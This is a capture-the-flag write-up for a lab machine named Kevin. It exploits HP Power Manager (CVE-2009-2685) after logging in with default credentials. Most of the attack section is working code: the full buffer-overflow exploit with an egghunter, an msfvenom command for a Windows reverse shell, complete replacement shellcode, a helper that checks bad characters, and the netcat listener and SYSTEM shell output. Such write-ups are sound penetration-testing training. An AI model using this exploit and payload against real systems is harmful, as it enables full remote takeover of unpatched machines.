Kevin
Enumeration:
Port Scanning:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 192.168.115.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-10 01:55 EST
Nmap scan report for 192.168.115.45
Host is up, received echo-reply ttl 125 (0.12s latency).
Scanned at 2025-11-10 01:55:28 EST for 101s
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 GoAhead WebServer
| http-title: HP Power Manager
|_Requested resource was http://192.168.115.45/index.asp
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: GoAhead-Webs
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 125 Windows 7 Ultimate N 7600 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: KEVIN
| NetBIOS_Domain_Name: KEVIN
| NetBIOS_Computer_Name: KEVIN
| DNS_Domain_Name: kevin
| DNS_Computer_Name: kevin
| Product_Version: 6.1.7600
|_ System_Time: 2025-11-10T06:56:54+00:00
| ssl-cert: Subject: commonName=kevin
| Issuer: commonName=kevin
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2025-11-09T06:51:48
| Not valid after: 2026-05-11T06:51:48
| MD5: f8ca:2645:3c64:cef1:1c8c:2fc6:30de:81d6
| SHA-1: 1192:49a2:11af:b68a:5d22:8615:efff:45fb:6723:b3bd
| -----BEGIN CERTIFICATE-----
| MIICzjCCAbagAwIBAgIQI5zyqr9unpJN3uLb6MzbCzANBgkqhkiG9w0BAQUFADAQ
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-11-10T06:57:09+00:00; +1s from scanner time.
3573/tcp open tag-ups-1? syn-ack ttl 125
49152/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49158/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49159/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: KEVIN; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
HTTP (80):
Let's browse to port 80:

With admin:admin (the product's default credentials), we can log in successfully:

If we go to the Help tab, we find the exact version of the running service:

Exploitation:
Search for public exploits:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ searchsploit HP Power Manager
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure | php/webapps/23163.txt
Hewlett-Packard (HP) Power Manager Administration - Remote Buffer Overflow (Metasploit) | windows/remote/16785.rb
Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow | windows/remote/10099.py
HP Power Manager - 'formExportDataLogs' Remote Buffer Overflow (Metasploit) | cgi/remote/18015.rb
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Let's try the Python one:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ searchsploit -m windows/remote/10099.py
Exploit: Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow
URL: https://www.exploit-db.com/exploits/10099
Path: /usr/share/exploitdb/exploits/windows/remote/10099.py
Codes: CVE-2009-2685
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/CTF/Machines/OffsecPG/Practice/Kevin/10099.py
Read the file:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ cat 10099.py
<snipped>
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# [*] Using Msf::Encoder::PexAlphaNum with final size of 709 bytes
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
<snipped>
"\x4f\x4f\x42\x4d\x5a")
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST
s.close()
The only thing we need to change here is the shellcode: we generate our own reverse shell with msfvenom, pointing at our IP address and listening port, and pass the script's bad-character list to -b so the encoder avoids them:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.187 LPORT=80 -b '\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a' -f c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Failed to locate a valid permutation.
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] =
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
<snipped>
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14";
Replace the SHELL bytes in the script with that output, keeping the "n00bn00b" egg in front of it; the short EH stub sent in the POST body is an egghunter that scans memory for that egg and jumps to whatever follows it:
#!/usr/bin/python
# HP Power Manager Administration Universal Buffer Overflow Exploit
# CVE 2009-2685
# Tested on Win2k3 Ent SP2 English, Win XP Sp2 English
# Matteo Memelli ryujin __A-T__ offensive-security.com
# www.offensive-security.com
# Spaghetti & Pwnsauce - 07/11/2009
#
# ryujin@bt:~$ ./hppowermanager.py 172.16.30.203
# HP Power Manager Administration Universal Buffer Overflow Exploit
# ryujin __A-T__ offensive-security.com
# [+] Sending evil buffer...
# HTTP/1.0 200 OK
# [+] Done!
# [*] Check your shell at 172.16.30.203:4444 , can take up to 1 min to spawn your shell
# ryujin@bt:~$ nc -v 172.16.30.203 4444
# 172.16.30.203: inverse host lookup failed: Unknown server error : Connection timed out
# (UNKNOWN) [172.16.30.203] 4444 (?) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
# C:\WINDOWS\system32>
import sys
from socket import *
print "HP Power Manager Administration Universal Buffer Overflow Exploit"
print "ryujin __A-T__ offensive-security.com"
try:
HOST = sys.argv[1]
except IndexError:
print "Usage: %s HOST" % sys.argv[0]
sys.exit()
PORT = 80
RET = "\xCF\xBC\x08\x76" # 7608BCCF JMP ESP MSVCP60.dll
# Original shellcode (Msf::Encoder::PexAlphaNum, 709 bytes) replaced with
# msfvenom windows/shell_reverse_tcp, x86/call4_dword_xor, 348 bytes (see above)
# badchar = "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a"
SHELL = (
"n00bn00b"
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x96\xb8\x8e\xc1\x83\xee\xfc\xe2\xf4\x6a\x50\x0c\xc1"
"\x96\xb8\xee\x48\x73\x89\x4e\xa5\x1d\xe8\xbe\x4a\xc4\xb4"
"\x05\x93\x82\x33\xfc\xe9\x99\x0f\xc4\xe7\xa7\x47\x22\xfd"
"\xf7\xc4\x8c\xed\xb6\x79\x41\xcc\x97\x7f\x6c\x33\xc4\xef"
"\x05\x93\x86\x33\xc4\xfd\x1d\xf4\x9f\xb9\x75\xf0\x8f\x10"
"\xc7\x33\xd7\xe1\x97\x6b\x05\x88\x8e\x5b\xb4\x88\x1d\x8c"
"\x05\xc0\x40\x89\x71\x6d\x57\x77\x83\xc0\x51\x80\x6e\xb4"
"\x60\xbb\xf3\x39\xad\xc5\xaa\xb4\x72\xe0\x05\x99\xb2\xb9"
"\x5d\xa7\x1d\xb4\xc5\x4a\xce\xa4\x8f\x12\x1d\xbc\x05\xc0"
"\x46\x31\xca\xe5\xb2\xe3\xd5\xa0\xcf\xe2\xdf\x3e\x76\xe7"
"\xd1\x9b\x1d\xaa\x65\x4c\xcb\xd0\xbd\xf3\x96\xb8\xe6\xb6"
"\xe5\x8a\xd1\x95\xfe\xf4\xf9\xe7\x91\x47\x5b\x79\x06\xb9"
"\x8e\xc1\xbf\x7c\xda\x91\xfe\x91\x0e\xaa\x96\x47\x5b\x91"
"\xc6\xe8\xde\x81\xc6\xf8\xde\xa9\x7c\xb7\x51\x21\x69\x6d"
"\x19\xab\x93\xd0\x4e\x69\xbb\x03\xe6\xc3\x96\xb8\xde\x48"
"\x70\xd2\x9e\x97\xc1\xd0\x17\x64\xe2\xd9\x71\x14\x13\x78"
"\xfa\xcd\x69\xf6\x86\xb4\x7a\xd0\x7e\x74\x34\xee\x71\x14"
"\xfe\xdb\xe3\xa5\x96\x31\x6d\x96\xc1\xef\xbf\x37\xfc\xaa"
"\xd7\x97\x74\x45\xe8\x06\xd2\x9c\xb2\xc0\x97\x35\xca\xe5"
"\x86\x7e\x8e\x85\xc2\xe8\xd8\x97\xc0\xfe\xd8\x8f\xc0\xee"
"\xdd\x97\xfe\xc1\x42\xfe\x10\x47\x5b\x48\x76\xf6\xd8\x87"
"\x69\x88\xe6\xc9\x11\xa5\xee\x3e\x43\x03\x7e\x74\x34\xee"
"\xe6\x67\x03\x05\x13\x3e\x43\x84\x88\xbd\x9c\x38\x75\x21"
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14")
EH ='\x33\xD2\x90\x90\x90\x42\x52\x6a'
EH +='\x02\x58\xcd\x2e\x3c\x05\x5a\x74'
EH +='\xf4\xb8\x6e\x30\x30\x62\x8b\xfa'
EH +='\xaf\x75\xea\xaf\x75\xe7\xff\xe7'
evil = "POST http://%s/goform/formLogin HTTP/1.1\r\n"
evil += "Host: %s\r\n"
evil += "User-Agent: %s\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Referer: http://%s/index.asp\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 678\r\n\r\n"
evil += "HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
evil += "\x41"*256 + RET + "\x90"*32 + EH + "\x42"*287 + "\x0d\x0a"
evil = evil % (HOST,HOST,SHELL,HOST)
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
print '[+] Sending evil buffer...'
s.send(evil)
print s.recv(1024)
print "[+] Done!"
print "[*] Check your shell at %s:4444 , can take up to 1 min to spawn your shell" % HOST  # message left from the original bind-shell payload; ours connects back to LHOST:LPORT
s.close()
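Before firing the modified script it is worth checking the pieces we touched. The following is an added example, not part of the original writeup or of 10099.py: it parses msfvenom `-f c` output into bytes, checks the shellcode against the bad-character list from the script, and rebuilds the request so the real body length can be compared with the hard-coded Content-Length and the distance to the return address can be confirmed. The RET, egghunter and buffer layout are the ones from the script above; the C-format sample is a constructed stand-in, not real msfvenom output. Only the User-Agent shellcode is checked for bad characters: the egghunter lives in the POST body, which the original author tested under its own constraints.

```python
#!/usr/bin/env python3
"""Added example (not from the original writeup): sanity-check the parts of the
HP Power Manager formLogin overflow that we modified before sending anything."""
import re

# Bad characters listed in 10099.py (and passed to msfvenom -b above).
BADCHARS = bytes.fromhex("003a263f2523200a0d2f2b0b5c3d3b2d2c2e24251a")

# From the exploit: JMP ESP in MSVCP60.dll, the egg, and the 32-byte egghunter
# that scans memory for "n00bn00b" and jumps to the bytes that follow it.
RET = b"\xcf\xbc\x08\x76"
EGG = b"n00bn00b"
EGGHUNTER = (b"\x33\xd2\x90\x90\x90\x42\x52\x6a"
             b"\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
             b"\xf4\xb8\x6e\x30\x30\x62\x8b\xfa"
             b"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

# Constructed stand-in for msfvenom `-f c` output (a few bytes, not a real payload).
SAMPLE_C_OUTPUT = r'''unsigned char buf[] =
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\xe3\xbd\x35\x86\x85\xca\xe1\xab\x96\xeb\x71\x14";'''


def parse_c_shellcode(text: str) -> bytes:
    """Turn the \\xNN string literals of msfvenom -f c output into raw bytes."""
    return b"".join(bytes.fromhex(h) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))


def find_badchars(shellcode: bytes, badchars: bytes = BADCHARS) -> list:
    """Return (offset, byte) pairs for every bad character present in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def build_request(host: str, shellcode: bytes) -> tuple:
    """Rebuild the exploit request with the script's layout; return (headers, body)."""
    body = (b"HtmlOnly=true&Password=admin&loginButton=Submit+Login&Login=admin"
            + b"A" * 256          # padding up to the saved return address
            + RET                 # overwritten with JMP ESP
            + b"\x90" * 32        # NOP sled landed on by JMP ESP
            + EGGHUNTER           # finds EGG in the User-Agent and jumps to it
            + b"B" * 287 + b"\r\n")
    ua = EGG + shellcode  # the egg marks where the real payload starts
    headers = (b"POST http://%s/goform/formLogin HTTP/1.1\r\n"
               b"Host: %s\r\n"
               b"User-Agent: %s\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: %d\r\n\r\n") % (host.encode(), host.encode(), ua, len(body))
    return headers, body


def ret_offset(body: bytes) -> int:
    """Distance from the start of the Login value to RET (5 for 'admin' + 256 padding)."""
    value_start = body.index(b"&Login=") + len(b"&Login=")
    return body.index(RET) - value_start


if __name__ == "__main__":
    sc = parse_c_shellcode(SAMPLE_C_OUTPUT)
    print("shellcode bytes:", len(sc), "bad chars:", find_badchars(sc))
    hdrs, body = build_request("192.168.115.45", sc)
    print("body length:", len(body), "RET offset:", ret_offset(body))
```

Paste the real msfvenom output into SAMPLE_C_OUTPUT (or read it from a file) and run the script; a non-empty bad-character list means the encoder missed something and the payload will be mangled by the web server before the egghunter ever reaches it. The body length of 678 matches the Content-Length the original exploit hard-codes, which is why changing only the User-Agent shellcode is safe.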
Now let's start a netcat listener on the port we chose as LPORT, then run the script with python2 (the exploit uses Python 2 syntax):
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ python2 10099.py 192.168.115.45
HP Power Manager Administration Universal Buffer Overflow Exploit
ryujin __A-T__ offensive-security.com
[+] Sending evil buffer...
HTTP/1.0 200 OK
[+] Done!
[*] Check your shell at 192.168.115.45:4444 , can take up to 1 min to spawn your shell
The ":4444" message is left over from the original payload; ours connects back to our listener. After waiting a minute:
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Kevin]
└─$ rlwrap nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.115.45] 49205
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
We have a reverse shell as NT AUTHORITY\SYSTEM straight away, because the HP Power Manager service runs with SYSTEM privileges; no privilege escalation is needed.
Get the flag:
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
3ca97c1c18601246670a218e277c9552